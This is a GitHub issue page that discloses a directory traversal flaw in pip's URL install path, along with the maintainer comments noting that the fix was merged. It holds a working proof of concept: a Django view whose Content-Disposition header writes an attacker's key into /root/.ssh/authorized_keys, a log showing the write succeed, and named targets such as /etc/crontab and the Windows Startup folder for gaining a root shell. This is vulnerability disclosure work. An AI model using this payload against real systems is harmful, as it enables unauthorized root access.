Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

pip install <url> allow directory traversal, leading to arbitrary file write #6413

Closed
gzpan123 opened this issue Apr 16, 2019 · 1 comment

Comments

@gzpan123
Copy link
Contributor

commented Apr 16, 2019

Environment

  • pip version: pip 19.0.3
  • Python version: Python 2.7.15 / Python 2.7.15
  • OS: Ubuntu 16.04 / Windows 10

Description

This is a security vulnerability.

when installing a remote package via a specified URL "pip install <url>", A malicious server (or a network MitM if downloading over HTTP) can send a Content-Disposition header with filename which contains "../", and pip did not sanitize the filename, join the Temporary directory and the filename as download path, which can write arbitrary file, potentially leading to command execution.

issue occurs in _download_http_url in src/pip/_internal/download.py

poc:

for linux, pip usually requires root privileges, we can write following files to get root shell:
/root/.ssh/authorized_keys
/etc/crontab

for windows, we can write a batch file to the user startup dir, lead to command execution on next boot:
C:\Users<User>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

for malicious header:

from django.http import HttpResponse

def linux(request):
    response = HttpResponse("malicious public key\n")
    filename = "../../../../../root/.ssh/authorized_keys"
    response['Content-Type'] = 'RANDOM' # avoid mimetypes.guess_extension guess ext
    response['Content-Disposition'] = 'attachment;filename="{0}"'.format(filename)
    return response

pip install malicious url result:

root@DESKTOP-FRESH:~# pip install http://192.168.40.16/linux
Looking in indexes: https://mirrors.aliyun.com/pypi/simple/
Collecting http://192.168.40.16/linux
  Downloading http://192.168.40.16/linux
  Cannot unpack file /root/.ssh/authorized_keys (downloaded from /tmp/pip-req-build-UAVkjW, content-type: RANDOM); cannot detect archive format
Cannot determine archive format of /tmp/pip-req-build-UAVkjW
root@DESKTOP-FRESH:~# cat /root/.ssh/authorized_keys
malicious public key
root@DESKTOP-FRESH:~#

similar issue:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9686

@cjerdonek

This comment has been minimized.

Copy link
Member

commented Jun 9, 2019

@gzpan123 posted a PR for this here: #6418

cjerdonek added a commit to gzpan123/pip that referenced this issue Jun 11, 2019

cjerdonek added a commit that referenced this issue Jun 11, 2019

Merge pull request #6418 from gzpan123/master
FIX #6413 pip install <url> allow directory traversal

@lock lock bot added the S: auto-locked label Jul 11, 2019

@lock lock bot locked as resolved and limited conversation to collaborators Jul 11, 2019

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Projects
None yet
2 participants
You can’t perform that action at this time.